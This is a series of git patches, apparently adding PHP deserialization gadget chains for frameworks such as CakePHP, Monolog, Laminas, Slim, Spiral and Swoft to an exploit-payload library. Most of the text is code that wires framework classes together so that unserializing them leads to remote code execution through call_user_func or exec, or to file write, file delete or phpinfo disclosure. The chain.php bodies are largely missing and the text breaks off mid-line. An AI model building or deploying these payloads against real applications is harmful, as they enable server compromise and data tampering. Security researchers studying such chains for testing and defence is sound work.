From 588f02657776e0b68fc049568087307df660a4d8 Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 22:49:38 +0800 Subject: [PATCH 01/31] Add files via upload --- gadgetchains/CakePHP/FI/1/chain.php | 18 ++++++++ gadgetchains/CakePHP/FI/1/gadgets.php | 62 +++++++++++++++++++++++++++ 2 files changed, 80 insertions(+) create mode 100644 gadgetchains/CakePHP/FI/1/chain.php create mode 100644 gadgetchains/CakePHP/FI/1/gadgets.php diff --git a/gadgetchains/CakePHP/FI/1/chain.php b/gadgetchains/CakePHP/FI/1/chain.php new file mode 100644 index 00000000..abc2c485 --- /dev/null +++ b/gadgetchains/CakePHP/FI/1/chain.php @@ -0,0 +1,18 @@ +pipes = new \PharIo\Manifest\ExtElementCollection($file); + } + } +} + +namespace PharIo\Manifest +{ + abstract class ElementCollection + { + private $nodeList; + + public function __construct($file) + { + $this->nodeList = new \App\Shell\ConsoleShell($file); + } + } + + class ExtElementCollection extends ElementCollection + { + public function __construct($file) + { + parent::__construct($file); + } + } +} + +namespace App\Shell +{ + class ConsoleShell + { + public $taskNames; + public $Tasks; + protected $_taskMap; + + public function __construct($file) + { + $this->taskNames = ["length"]; + $this->_taskMap = ["length"=>["class"=>$file]]; + $this->Tasks = new \Twig\Cache\FilesystemCache(); + } + } +} + +namespace Twig\Cache +{ + class FilesystemCache + { + public function __construct() + { + } + } +} \ No newline at end of file From 1ce1c7f1f1ce07f190075568dd4b74ee46cf37b3 Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 22:50:47 +0800 Subject: [PATCH 02/31] Add files via upload --- gadgetchains/CakePHP/INFO/1/chain.php | 15 +++++++++ gadgetchains/CakePHP/INFO/1/gadgets.php | 43 +++++++++++++++++++++++++ 2 files changed, 58 insertions(+) create mode 100644 gadgetchains/CakePHP/INFO/1/chain.php create mode 100644 gadgetchains/CakePHP/INFO/1/gadgets.php diff --git a/gadgetchains/CakePHP/INFO/1/chain.php b/gadgetchains/CakePHP/INFO/1/chain.php new file mode 100644 index 00000000..cce992c2 --- /dev/null +++ b/gadgetchains/CakePHP/INFO/1/chain.php @@ -0,0 +1,15 @@ +options = ['create_new_console'=>true]; + $this->processPipes = new \Cake\ORM\Association\HasMany(); + } + } +} + +namespace Cake\ORM\Association +{ + class HasMany + { + protected $_targetTable=false; + protected $_className; + + function __construct() + { + $this->_className = new \Cake\Http\CallbackStream(); + } + } +} + +namespace Cake\Http +{ + class CallbackStream + { + protected $callback; + + function __construct() + { + $this->callback = 'phpinfo'; + } + } +} \ No newline at end of file From 3630abddde7edee1d61706cedcaf0d4545ebdf25 Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 22:51:59 +0800 Subject: [PATCH 03/31] Add files via upload --- gadgetchains/CakePHP/RCE/3/chain.php | 18 ++++++ gadgetchains/CakePHP/RCE/3/gadgets.php | 53 ++++++++++++++++++ gadgetchains/CakePHP/RCE/4/chain.php | 18 ++++++ gadgetchains/CakePHP/RCE/4/gadgets.php | 77 ++++++++++++++++++++++++++ 4 files changed, 166 insertions(+) create mode 100644 gadgetchains/CakePHP/RCE/3/chain.php create mode 100644 gadgetchains/CakePHP/RCE/3/gadgets.php create mode 100644 gadgetchains/CakePHP/RCE/4/chain.php create mode 100644 gadgetchains/CakePHP/RCE/4/gadgets.php diff --git a/gadgetchains/CakePHP/RCE/3/chain.php b/gadgetchains/CakePHP/RCE/3/chain.php new file mode 100644 index 00000000..f1cf49f5 --- /dev/null +++ b/gadgetchains/CakePHP/RCE/3/chain.php @@ -0,0 +1,18 @@ +pipes = new \Cake\Database\Statement\BufferedStatement($func, $args); + } + } +} + +namespace Cake\Database\Statement +{ + class CallbackStatement + { + protected $_callback; + protected $_statement; + + public function __construct($func, $args) + { + $this->_callback = $func; + $this->_statement = new \Symfony\Component\Console\Output\BufferedOutput($args); + } + } + + class BufferedStatement + { + protected $_allFetched=false; + protected $statement; + + public function __construct($func, $args) + { + $this->statement = new CallbackStatement($func, $args); + } + } +} + +namespace Symfony\Component\Console\Output +{ + class BufferedOutput + { + private $buffer; + + public function __construct($args) + { + $this->buffer = $args; + } + } +} \ No newline at end of file diff --git a/gadgetchains/CakePHP/RCE/4/chain.php b/gadgetchains/CakePHP/RCE/4/chain.php new file mode 100644 index 00000000..fbb47e60 --- /dev/null +++ b/gadgetchains/CakePHP/RCE/4/chain.php @@ -0,0 +1,18 @@ +pipes = new \PharIo\Manifest\ExtElementCollection($func, $args); + } + } +} + +namespace PharIo\Manifest +{ + abstract class ElementCollection + { + private $nodeList; + + public function __construct($func, $args) + { + $this->nodeList = new \App\Shell\ConsoleShell($func, $args); + } + } + + class ExtElementCollection extends ElementCollection + { + public function __construct($func, $args) + { + parent::__construct($func, $args); + } + } +} + +namespace App\Shell +{ + class ConsoleShell + { + public $taskNames; + public $Tasks; + protected $_taskMap; + + public function __construct($func, $args) + { + $this->taskNames = ["length"]; + $this->_taskMap = ["length"=>["class"=>$args,"config"=>["className"=>new \Symfony\Component\Console\Helper\Dumper($func)]]]; + $this->Tasks = new \Cake\Log\LogEngineRegistry(); + } + } +} + +namespace Cake\Log +{ + class LogEngineRegistry + { + protected $_loaded=[]; + + public function __construct() + { + } + } +} + +namespace Symfony\Component\Console\Helper +{ + class Dumper + { + private $handler; + + public function __construct($func) + { + $this->handler = $func; + } + } +} \ No newline at end of file From 3f0af9a2531e618fd964c9dc28513e5f54e10dfc Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 22:53:11 +0800 Subject: [PATCH 04/31] Add files via upload --- gadgetchains/CodeIgniter4/RCE/7/chain.php | 18 ++++++ gadgetchains/CodeIgniter4/RCE/7/gadgets.php | 70 +++++++++++++++++++++ 2 files changed, 88 insertions(+) create mode 100644 gadgetchains/CodeIgniter4/RCE/7/chain.php create mode 100644 gadgetchains/CodeIgniter4/RCE/7/gadgets.php diff --git a/gadgetchains/CodeIgniter4/RCE/7/chain.php b/gadgetchains/CodeIgniter4/RCE/7/chain.php new file mode 100644 index 00000000..54793dcc --- /dev/null +++ b/gadgetchains/CodeIgniter4/RCE/7/chain.php @@ -0,0 +1,18 @@ +redis = new \CodeIgniter\Session\Handlers\DatabaseHandler($function, $paramter); + } + } +} + +namespace CodeIgniter\Session\Handlers +{ + class DatabaseHandler + { + protected $lock; + protected $platform='mysql'; + protected $db; + + function __construct($function, $parameter) + { + $this->lock = new \Symfony\Component\HttpFoundation\Request($function, $parameter); + $this->db = new \CodeIgniter\Database\MySQLi\Connection(); + } + } +} + +namespace Symfony\Component\HttpFoundation +{ + class Request + { + public $server; + public $cookies; + + function __construct($function, $paramter) + { + $this->cookies = ["key" => "value"]; + $this->server = new \Symfony\Component\DependencyInjection\Argument\ServiceLocator($function, $paramter); + } + } +} + +namespace Symfony\Component\DependencyInjection\Argument +{ + class ServiceLocator + { + private $serviceMap; + private $factory; + + function __construct($function, $paramter) + { + $this->factory = "call_user_func"; + $this->serviceMap = ["REQUEST_METHOD" => [$function, $paramter]]; + } + } +} + +namespace CodeIgniter\Database\MySQLi +{ + class Connection + { + function __construct() + { + } + } +} \ No newline at end of file From 3ad0f64f863566e128204f63b74fd2b08fe38bb0 Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 22:54:48 +0800 Subject: [PATCH 05/31] Add files via upload --- gadgetchains/Laminas/RCE/1/chain.php | 19 ++++++++++++ gadgetchains/Laminas/RCE/1/gadgets.php | 43 ++++++++++++++++++++++++++ 2 files changed, 62 insertions(+) create mode 100644 gadgetchains/Laminas/RCE/1/chain.php create mode 100644 gadgetchains/Laminas/RCE/1/gadgets.php diff --git a/gadgetchains/Laminas/RCE/1/chain.php b/gadgetchains/Laminas/RCE/1/chain.php new file mode 100644 index 00000000..78ef6649 --- /dev/null +++ b/gadgetchains/Laminas/RCE/1/chain.php @@ -0,0 +1,19 @@ + diff --git a/gadgetchains/Laminas/RCE/1/gadgets.php b/gadgetchains/Laminas/RCE/1/gadgets.php new file mode 100644 index 00000000..70b490a9 --- /dev/null +++ b/gadgetchains/Laminas/RCE/1/gadgets.php @@ -0,0 +1,43 @@ +streamName = new \Laminas\Uri\Mailto($function,$parameter); + } + } +} + +namespace Laminas\Uri +{ + class Mailto + { + protected $path; + protected $emailValidator; + + function __construct($function,$parameter) + { + $this->path = $parameter; + $this->emailValidator = new \Laminas\Validator\Callback($function); + } + } +} + +namespace Laminas\Validator +{ + class Callback + { + protected $options=[]; + + function __construct($function) + { + $this->options["callback"]=$function; + } + } +} \ No newline at end of file From 08292bb30ae08a54a36148d1fb3ad7a816d90328 Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 22:58:20 +0800 Subject: [PATCH 06/31] Add files via upload --- gadgetchains/Monolog/FD/1/chain.php | 17 +++++++++++++++++ gadgetchains/Monolog/FD/1/gadgets.php | 18 ++++++++++++++++++ 2 files changed, 35 insertions(+) create mode 100644 gadgetchains/Monolog/FD/1/chain.php create mode 100644 gadgetchains/Monolog/FD/1/gadgets.php diff --git a/gadgetchains/Monolog/FD/1/chain.php b/gadgetchains/Monolog/FD/1/chain.php new file mode 100644 index 00000000..37f6107c --- /dev/null +++ b/gadgetchains/Monolog/FD/1/chain.php @@ -0,0 +1,17 @@ +filename = $path; + } + } +} \ No newline at end of file From 7f83ff0f7a74f470611f525521e1fd58a624b37d Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 22:59:51 +0800 Subject: [PATCH 07/31] Add files via upload --- gadgetchains/Monolog/FW/2/chain.php | 18 +++++++++++ gadgetchains/Monolog/FW/2/gadgets.php | 41 +++++++++++++++++++++++++ gadgetchains/Monolog/FW/3/chain.php | 19 ++++++++++++ gadgetchains/Monolog/FW/3/gadgets.php | 43 +++++++++++++++++++++++++++ 4 files changed, 121 insertions(+) create mode 100644 gadgetchains/Monolog/FW/2/chain.php create mode 100644 gadgetchains/Monolog/FW/2/gadgets.php create mode 100644 gadgetchains/Monolog/FW/3/chain.php create mode 100644 gadgetchains/Monolog/FW/3/gadgets.php diff --git a/gadgetchains/Monolog/FW/2/chain.php b/gadgetchains/Monolog/FW/2/chain.php new file mode 100644 index 00000000..fd7ef9a2 --- /dev/null +++ b/gadgetchains/Monolog/FW/2/chain.php @@ -0,0 +1,18 @@ +buffer = [["level"=>1,"message"=>$data,'datetime'=>new \Gelf\Message(),'level_name'=>'']]; + $this->deduplicationStore = $path; + } + } + + class GroupHandler + { + protected $handlers; + + public function __construct($path, $data) + { + $this->handlers = [new DeduplicationHandler($path, $data)]; + } + } +} + +namespace Gelf +{ + class Message + { + protected $timestamp=0; + + public function __construct() + { + } + } +} \ No newline at end of file diff --git a/gadgetchains/Monolog/FW/3/chain.php b/gadgetchains/Monolog/FW/3/chain.php new file mode 100644 index 00000000..84988f7c --- /dev/null +++ b/gadgetchains/Monolog/FW/3/chain.php @@ -0,0 +1,19 @@ +buffer = [["level"=>1]]; + $this->handler = new NativeMailerHandler($path, $data); + } + } + + class NativeMailerHandler + { + protected $level=0; + protected $formatter; + protected $contentType='text/plain'; + protected $parameters; + protected $to=["a@b.c"]; + protected $subject; + + public function __construct($path, $data) + { + $this->subject = $data; + $this->parameters = ['-OQueueDirectory=/tmp', '-X' . $path]; + } + } +} + +namespace Monolog\Formatter +{ + class NormalizerFormatter + { + public function __construct() + { + } + } +} \ No newline at end of file From 34c0bb488ce50165fadc702b604a69b8ff3b633b Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 23:00:51 +0800 Subject: [PATCH 08/31] Add files via upload --- gadgetchains/Monolog/RCE/10/chain.php | 17 ++++++++++ gadgetchains/Monolog/RCE/10/gadgets.php | 43 +++++++++++++++++++++++++ 2 files changed, 60 insertions(+) create mode 100644 gadgetchains/Monolog/RCE/10/chain.php create mode 100644 gadgetchains/Monolog/RCE/10/gadgets.php diff --git a/gadgetchains/Monolog/RCE/10/chain.php b/gadgetchains/Monolog/RCE/10/chain.php new file mode 100644 index 00000000..47ece120 --- /dev/null +++ b/gadgetchains/Monolog/RCE/10/chain.php @@ -0,0 +1,17 @@ +buffer = [["level"=>1]]; + $this->handler = new ProcessHandler($cmd); + } + } + + class ProcessHandler + { + protected $level=0; + protected $formatter; + private $command; + private $pipes = []; + + function __construct($cmd) + { + $this->formatter = new \Monolog\Formatter\NormalizerFormatter(); + $this->command = $cmd; + } + } +} + +namespace Monolog\Formatter +{ + class NormalizerFormatter + { + protected $maxNormalizeDepth = -1; + + function __construct() + { + } + } +} \ No newline at end of file From 23c42e04147bacf264184edd24ffc83e782fec76 Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 23:01:45 +0800 Subject: [PATCH 09/31] Add files via upload --- gadgetchains/Omnipay/RCE/1/chain.php | 18 +++++++++++ gadgetchains/Omnipay/RCE/1/gadgets.php | 43 ++++++++++++++++++++++++++ 2 files changed, 61 insertions(+) create mode 100644 gadgetchains/Omnipay/RCE/1/chain.php create mode 100644 gadgetchains/Omnipay/RCE/1/gadgets.php diff --git a/gadgetchains/Omnipay/RCE/1/chain.php b/gadgetchains/Omnipay/RCE/1/chain.php new file mode 100644 index 00000000..4c9bee74 --- /dev/null +++ b/gadgetchains/Omnipay/RCE/1/chain.php @@ -0,0 +1,18 @@ +filename = new \Http\Message\Encoding\ChunkStream($function,$param); + } + } +} + +namespace Http\Message\Encoding +{ + class ChunkStream + { + protected $stream; + protected $buffer='x'; + protected $readFilterCallback; + + function __construct($function,$param) + { + $this->stream = new \GuzzleHttp\Psr7\BufferStream($param); + $this->readFilterCallback = $function; + } + } +} + +namespace GuzzleHttp\Psr7 +{ + class BufferStream + { + private $buffer; + + public function __construct($parameter) + { + $this->buffer = $parameter; + } + } +} \ No newline at end of file From 97a8d4c49d2d7d96732030e32f49fde295dcb7b4 Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 23:04:16 +0800 Subject: [PATCH 10/31] Add files via upload --- gadgetchains/Phing/FD/2/chain.php | 15 +++++++++++++++ gadgetchains/Phing/FD/2/gadgets.php | 10 ++++++++++ 2 files changed, 25 insertions(+) create mode 100644 gadgetchains/Phing/FD/2/chain.php create mode 100644 gadgetchains/Phing/FD/2/gadgets.php diff --git a/gadgetchains/Phing/FD/2/chain.php b/gadgetchains/Phing/FD/2/chain.php new file mode 100644 index 00000000..b5b2cf52 --- /dev/null +++ b/gadgetchains/Phing/FD/2/chain.php @@ -0,0 +1,15 @@ +path = $path; + } +} From 9454b857bc1370f7ca8b89e7a85221b194dbd001 Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 23:05:31 +0800 Subject: [PATCH 11/31] Add files via upload --- gadgetchains/PHPCSFixer/FD/3/chain.php | 17 +++++++++++++++++ gadgetchains/PHPCSFixer/FD/3/gadgets.php | 14 ++++++++++++++ 2 files changed, 31 insertions(+) create mode 100644 gadgetchains/PHPCSFixer/FD/3/chain.php create mode 100644 gadgetchains/PHPCSFixer/FD/3/gadgets.php diff --git a/gadgetchains/PHPCSFixer/FD/3/chain.php b/gadgetchains/PHPCSFixer/FD/3/chain.php new file mode 100644 index 00000000..99022b5f --- /dev/null +++ b/gadgetchains/PHPCSFixer/FD/3/chain.php @@ -0,0 +1,17 @@ +tmpFilePath = $remote_path; + } + } +} \ No newline at end of file From 1060e2ea0ab9f0ae0d5f1674a51193d1bce51070 Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 23:06:20 +0800 Subject: [PATCH 12/31] Add files via upload --- gadgetchains/PHPCSFixer/FW/1/chain.php | 19 ++++++++++ gadgetchains/PHPCSFixer/FW/1/gadgets.php | 48 ++++++++++++++++++++++++ 2 files changed, 67 insertions(+) create mode 100644 gadgetchains/PHPCSFixer/FW/1/chain.php create mode 100644 gadgetchains/PHPCSFixer/FW/1/gadgets.php diff --git a/gadgetchains/PHPCSFixer/FW/1/chain.php b/gadgetchains/PHPCSFixer/FW/1/chain.php new file mode 100644 index 00000000..163d5f84 --- /dev/null +++ b/gadgetchains/PHPCSFixer/FW/1/chain.php @@ -0,0 +1,19 @@ +cache = new Cache($data); + $this->handler = new FileHandler($remote_path); + } + } + + class FileHandler + { + private $file; + + function __construct($file_path) + { + $this->file = $file_path; + } + } + + class Signature + { + private $phpVersion = ''; + private $fixerVersion = ''; + private $indent = ''; + private $lineEnding = ''; + private $rules = []; + + function __construct(){} + } + + class Cache + { + private $hashes; + private $signature; + + function __construct($data) { + $this->hashes = $data; + $this->signature = new Signature(); + } + } +} \ No newline at end of file From 470501a405321f77f46b79a691153169d12d2190 Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 23:07:35 +0800 Subject: [PATCH 13/31] Add files via upload --- gadgetchains/PopPHP/FD/1/chain.php | 15 ++++++++++ gadgetchains/PopPHP/FD/1/gadgets.php | 21 ++++++++++++++ gadgetchains/PopPHP/FW/1/chain.php | 19 +++++++++++++ gadgetchains/PopPHP/FW/1/gadgets.php | 42 ++++++++++++++++++++++++++++ 4 files changed, 97 insertions(+) create mode 100644 gadgetchains/PopPHP/FD/1/chain.php create mode 100644 gadgetchains/PopPHP/FD/1/gadgets.php create mode 100644 gadgetchains/PopPHP/FW/1/chain.php create mode 100644 gadgetchains/PopPHP/FW/1/gadgets.php diff --git a/gadgetchains/PopPHP/FD/1/chain.php b/gadgetchains/PopPHP/FD/1/chain.php new file mode 100644 index 00000000..5fbacfa5 --- /dev/null +++ b/gadgetchains/PopPHP/FD/1/chain.php @@ -0,0 +1,15 @@ +path = $path; + } + } + class TemporaryFileByteStream extends FileByteStream + { + public function __construct($path) + { + parent::__construct($path); + } + } +} \ No newline at end of file diff --git a/gadgetchains/PopPHP/FW/1/chain.php b/gadgetchains/PopPHP/FW/1/chain.php new file mode 100644 index 00000000..e981affc --- /dev/null +++ b/gadgetchains/PopPHP/FW/1/chain.php @@ -0,0 +1,19 @@ +buffer = new \Pop\Mail\Transport\Smtp\Stream\Byte\FileByteStream($path, $data); + } + } +} + +namespace Pop\Mail\Transport\Smtp\Stream\Byte +{ + abstract class AbstractFilterableInputStream + { + private $writeBuffer; + + public function __construct($data) + { + $this->writeBuffer = $data; + } + } + + class FileByteStream extends AbstractFilterableInputStream + { + private $filters=[]; + private $path; + private $mode='w'; + + public function __construct($path, $data) + { + parent::__construct($data); + $this->path = $path; + } + } +} \ No newline at end of file From 1699fa499ea606f0a5f72f7f7932a2e3bd504f79 Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 23:08:50 +0800 Subject: [PATCH 14/31] Add files via upload --- gadgetchains/Slim/RCE/2/chain.php | 18 ++++++++++ gadgetchains/Slim/RCE/2/gadgets.php | 54 +++++++++++++++++++++++++++++ gadgetchains/Slim/RCE/3/chain.php | 18 ++++++++++ gadgetchains/Slim/RCE/3/gadgets.php | 53 ++++++++++++++++++++++++++++ gadgetchains/Slim/RCE/4/chain.php | 18 ++++++++++ gadgetchains/Slim/RCE/4/gadgets.php | 28 +++++++++++++++ 6 files changed, 189 insertions(+) create mode 100644 gadgetchains/Slim/RCE/2/chain.php create mode 100644 gadgetchains/Slim/RCE/2/gadgets.php create mode 100644 gadgetchains/Slim/RCE/3/chain.php create mode 100644 gadgetchains/Slim/RCE/3/gadgets.php create mode 100644 gadgetchains/Slim/RCE/4/chain.php create mode 100644 gadgetchains/Slim/RCE/4/gadgets.php diff --git a/gadgetchains/Slim/RCE/2/chain.php b/gadgetchains/Slim/RCE/2/chain.php new file mode 100644 index 00000000..a866a199 --- /dev/null +++ b/gadgetchains/Slim/RCE/2/chain.php @@ -0,0 +1,18 @@ +keys = $this->raw = $this->values = $array; + } + } +} + +namespace Slim +{ + class App + { + private $container; + + function __construct($container) + { + $this->container = $container; + } + } + + class Container extends \Pimple\Container + { + + } +} + +namespace Prophecy\Argument\Token +{ + use \Slim\App; + use \Slim\Container; + + class ExactValueToken + { + private $util; + private $value; + + function __construct($function, $parameter) + { + $z = new App(new Container(['has' => $function])); + $y = new App($z); + $this->util = new App(new Container(['stringify' => [$y, $parameter]])); + $this->value = $parameter; + } + } +} \ No newline at end of file diff --git a/gadgetchains/Slim/RCE/3/chain.php b/gadgetchains/Slim/RCE/3/chain.php new file mode 100644 index 00000000..6a9b0056 --- /dev/null +++ b/gadgetchains/Slim/RCE/3/chain.php @@ -0,0 +1,18 @@ +keys = $this->raw = $this->values = $array; + } + } +} + +namespace Slim +{ + class App + { + private $container; + + function __construct($container) + { + $this->container = $container; + } + } + + class Container extends \Pimple\Container + { + + } +} + +namespace phpDocumentor\Reflection\DocBlock\Tags +{ + use \Slim\App; + use \Slim\Container; + + class Method + { + private $arguments = []; + protected $description; + + function __construct($function, $parameter) + { + $z = new App(new Container(['has' => $function])); + $y = new App($z); + $this->description = new App(new Container(['render' => [$y, $parameter]])); + } + } +} \ No newline at end of file diff --git a/gadgetchains/Slim/RCE/4/chain.php b/gadgetchains/Slim/RCE/4/chain.php new file mode 100644 index 00000000..92f7f275 --- /dev/null +++ b/gadgetchains/Slim/RCE/4/chain.php @@ -0,0 +1,18 @@ +util = new \AdrianSuter\Autoload\Override\ClosureHandler($function); + $this->value = $parameter; + } + } +} + +namespace AdrianSuter\Autoload\Override +{ + class ClosureHandler + { + private $closures; + + function __construct($function) + { + $this->closures = ["stringify"=>$function]; + } + } +} \ No newline at end of file From 5cc966a96581979d5a6db7047ef3a060ab717de9 Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 23:10:07 +0800 Subject: [PATCH 15/31] Add files via upload --- gadgetchains/Spiral/FD/1/chain.php | 13 +++++++++++++ gadgetchains/Spiral/FD/1/gadgets.php | 14 ++++++++++++++ gadgetchains/Spiral/FD/2/chain.php | 14 ++++++++++++++ gadgetchains/Spiral/FD/2/gadgets.php | 13 +++++++++++++ 4 files changed, 54 insertions(+) create mode 100644 gadgetchains/Spiral/FD/1/chain.php create mode 100644 gadgetchains/Spiral/FD/1/gadgets.php create mode 100644 gadgetchains/Spiral/FD/2/chain.php create mode 100644 gadgetchains/Spiral/FD/2/gadgets.php diff --git a/gadgetchains/Spiral/FD/1/chain.php b/gadgetchains/Spiral/FD/1/chain.php new file mode 100644 index 00000000..f55c2279 --- /dev/null +++ b/gadgetchains/Spiral/FD/1/chain.php @@ -0,0 +1,13 @@ +destructFiles, $remote_path); + } + + } +} \ No newline at end of file diff --git a/gadgetchains/Spiral/FD/2/chain.php b/gadgetchains/Spiral/FD/2/chain.php new file mode 100644 index 00000000..2fdaa28d --- /dev/null +++ b/gadgetchains/Spiral/FD/2/chain.php @@ -0,0 +1,14 @@ +dir = $remote_path; + } + } +} \ No newline at end of file From bae565e1cd51098cb365678a1cb759d95c2d6b8b Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 23:11:39 +0800 Subject: [PATCH 16/31] Add files via upload --- gadgetchains/Spiral/INFO/1/chain.php | 15 +++++++ gadgetchains/Spiral/INFO/1/gadgets.php | 54 ++++++++++++++++++++++++++ 2 files changed, 69 insertions(+) create mode 100644 gadgetchains/Spiral/INFO/1/chain.php create mode 100644 gadgetchains/Spiral/INFO/1/gadgets.php diff --git a/gadgetchains/Spiral/INFO/1/chain.php b/gadgetchains/Spiral/INFO/1/chain.php new file mode 100644 index 00000000..85f61c7e --- /dev/null +++ b/gadgetchains/Spiral/INFO/1/chain.php @@ -0,0 +1,15 @@ +finalizer = new \SebastianBergmann\CodeCoverage\Report\Xml\Coverage(); + } + } +} + +namespace SebastianBergmann\CodeCoverage\Report\Xml +{ + class Coverage + { + private $writer; + private $contextNode; + + function __construct() + { + $this->writer = new \XMLWriter; + $this->contextNode = new \Spiral\Http\Request\InputManager(); + } + } +} + +namespace Spiral\Http\Request +{ + class InputManager + { + protected $container; + + function __construct() + { + $this->container = new \Symfony\Component\Console\CommandLoader\FactoryCommandLoader(); + } + } +} + +namespace Symfony\Component\Console\CommandLoader +{ + class FactoryCommandLoader + { + private $factories; + function __construct() + { + $this->factories = ["Psr\Http\Message\ServerRequestInterface"=>"phpinfo"]; + } + } +} \ No newline at end of file From 8b7e46d50ec5e589457b198abaaa81eca0603e94 Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 23:12:40 +0800 Subject: [PATCH 17/31] Add files via upload --- gadgetchains/Spiral/RCE/3/chain.php | 17 +++++++ gadgetchains/Spiral/RCE/3/gadgets.php | 56 +++++++++++++++++++++++ gadgetchains/Spiral/RCE/4/chain.php | 18 ++++++++ gadgetchains/Spiral/RCE/4/gadgets.php | 66 +++++++++++++++++++++++++++ 4 files changed, 157 insertions(+) create mode 100644 gadgetchains/Spiral/RCE/3/chain.php create mode 100644 gadgetchains/Spiral/RCE/3/gadgets.php create mode 100644 gadgetchains/Spiral/RCE/4/chain.php create mode 100644 gadgetchains/Spiral/RCE/4/gadgets.php diff --git a/gadgetchains/Spiral/RCE/3/chain.php b/gadgetchains/Spiral/RCE/3/chain.php new file mode 100644 index 00000000..e7660930 --- /dev/null +++ b/gadgetchains/Spiral/RCE/3/chain.php @@ -0,0 +1,17 @@ +buffer = [['level'=>101,'level_name'=>$command,'context'=>[]]]; + $this->handler = new PsrHandler(); + } + } + + class PsrHandler + { + protected $formatter; + protected $logger; + + function __construct() + { + $this->formatter = new \Monolog\Formatter\NormalizerFormatter(); + $this->logger = new \Spiral\Logger\NullLogger(); + } + } +} + +namespace Monolog\Formatter +{ + class NormalizerFormatter + { + protected $maxNormalizeDepth = -1; + + function __construct() + { + } + } +} + +namespace Spiral\Logger +{ + class NullLogger + { + private $receptor; + private $channel; + + function __construct() + { + $this->receptor = 'call_user_func'; + $this->channel = 'exec'; + } + } +} \ No newline at end of file diff --git a/gadgetchains/Spiral/RCE/4/chain.php b/gadgetchains/Spiral/RCE/4/chain.php new file mode 100644 index 00000000..e210f920 --- /dev/null +++ b/gadgetchains/Spiral/RCE/4/chain.php @@ -0,0 +1,18 @@ +finalizer = new \Cycle\Database\Driver\Postgres\Schema\PostgresColumn($function,$param); + } + } +} + +namespace Cycle\Database\Driver\Postgres\Schema +{ + class PostgresColumn + { + protected $mapping; + + function __construct($function,$param) + { + $this->mapping = new \Spiral\Session\SectionScope($function,$param); + } + } +} + +namespace Spiral\Session +{ + class SectionScope + { + private $session; + + function __construct($function,$param) + { + $this->session = new SessionScope($function,$param); + } + + } + + class SessionScope + { + private $container; + + function __construct($function,$param) + { + $this->container = new \PhpOption\LazyOption($function,$param); + } + } +} + +namespace PhpOption +{ + class LazyOption + { + private $callback; + private $arguments; + + public function __construct($function,$parameter) + { + $this->callback = $function; + $this->arguments = [$parameter]; + } + } +} \ No newline at end of file From b2c4f08ca1233d9616fad15c318eaa4afd009606 Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 23:13:52 +0800 Subject: [PATCH 18/31] Add files via upload --- gadgetchains/SwiftMailer/FD/3/chain.php | 15 +++++++++++++++ gadgetchains/SwiftMailer/FD/3/gadgets.php | 16 ++++++++++++++++ 2 files changed, 31 insertions(+) create mode 100644 gadgetchains/SwiftMailer/FD/3/chain.php create mode 100644 gadgetchains/SwiftMailer/FD/3/gadgets.php diff --git a/gadgetchains/SwiftMailer/FD/3/chain.php b/gadgetchains/SwiftMailer/FD/3/chain.php new file mode 100644 index 00000000..81061616 --- /dev/null +++ b/gadgetchains/SwiftMailer/FD/3/chain.php @@ -0,0 +1,15 @@ +_path = array_shift($parts); + $filename = array_pop($parts); + $midpath = implode('/',$parts); + $this->_keys = [$midpath => [$filename => '']]; + } +} \ No newline at end of file From f6bfa3aee8ecb1c1d5b140a566eb3423b9c31e6a Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 23:15:18 +0800 Subject: [PATCH 19/31] Add files via upload --- gadgetchains/Swoft/FD/1/chain.php | 15 ++++++ gadgetchains/Swoft/FD/1/gadgets.php | 45 ++++++++++++++++++ gadgetchains/Swoft/FW/1/chain.php | 18 +++++++ gadgetchains/Swoft/FW/1/gadgets.php | 42 +++++++++++++++++ gadgetchains/Swoft/FW/2/chain.php | 18 +++++++ gadgetchains/Swoft/FW/2/gadgets.php | 50 ++++++++++++++++++++ gadgetchains/Swoft/RCE/1/chain.php | 18 +++++++ gadgetchains/Swoft/RCE/1/gadgets.php | 70 ++++++++++++++++++++++++++++ 8 files changed, 276 insertions(+) create mode 100644 gadgetchains/Swoft/FD/1/chain.php create mode 100644 gadgetchains/Swoft/FD/1/gadgets.php create mode 100644 gadgetchains/Swoft/FW/1/chain.php create mode 100644 gadgetchains/Swoft/FW/1/gadgets.php create mode 100644 gadgetchains/Swoft/FW/2/chain.php create mode 100644 gadgetchains/Swoft/FW/2/gadgets.php create 